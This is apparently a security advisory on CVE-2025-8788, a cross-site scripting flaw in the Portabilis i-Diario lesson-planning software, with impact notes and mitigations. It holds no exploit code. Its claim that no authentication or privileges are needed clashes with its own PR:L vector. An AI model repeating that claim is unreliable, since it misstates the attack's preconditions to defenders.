CVE-2025-8788 is a cross-site scripting (XSS) vulnerability identified in the Portabilis i-Diario software, versions up to 1.5.0. The vulnerability resides in the component 'Informações adicionais', specifically within the functionality related to the file /planos-de-aula-por-areas-de-conhecimento/. It arises from improper sanitization or validation of user-supplied input in the argument fields Parecer, Conteúdos, and Objetivos. An attacker can craft malicious input that, when processed by the vulnerable component, results in the execution of arbitrary JavaScript code in the context of the victim's browser. This vulnerability can be exploited remotely without requiring authentication, although it does require user interaction (e.g., the victim visiting a maliciously crafted URL or page). The CVSS 4.0 base score is 5.1, indicating a medium severity level. The vector details highlight that the attack vector is network-based (AV:N), with low attack complexity (AC:L), no privileges required (PR:L), and user interaction needed (UI:P). The vulnerability impacts confidentiality and integrity to a limited extent, as it allows script execution that could lead to session hijacking, defacement, or redirection to malicious sites, but does not directly affect availability. The vendor was notified early but has not responded, and no patches are currently available. Although no known exploits are reported in the wild, public disclosure of the exploit code increases the risk of exploitation attempts.

For European organizations using Portabilis i-Diario, particularly educational institutions or administrative bodies relying on this software for lesson planning and knowledge area management, this vulnerability poses a tangible risk. Successful exploitation could lead to session hijacking, unauthorized actions on behalf of users, or the spread of malware through injected scripts. This could compromise sensitive educational data, disrupt normal operations, and damage trust in the platform. Given that the vulnerability requires user interaction, phishing or social engineering campaigns could be used to lure users into triggering the exploit. The lack of vendor response and patches increases the window of exposure. Additionally, since the software is used in educational contexts, the impact on minors and compliance with European data protection regulations (such as GDPR) could raise legal and reputational concerns.

1. Immediate deployment of web application firewalls (WAFs) with custom rules to detect and block suspicious input patterns targeting the vulnerable parameters (Parecer, Conteúdos, Objetivos). 2. Implement strict input validation and output encoding on the affected endpoints, ideally by applying server-side filters to sanitize user inputs before rendering. 3. Educate users about the risks of clicking on untrusted links and encourage cautious behavior regarding unsolicited communications. 4. Monitor logs for unusual activity or repeated attempts to exploit the vulnerability. 5. If possible, isolate or restrict access to the vulnerable component until a vendor patch or official fix is released. 6. Engage with the vendor or community to push for an official patch or consider alternative software solutions if the vendor remains unresponsive. 7. Conduct regular security assessments and penetration tests focusing on web application vulnerabilities to detect similar issues proactively.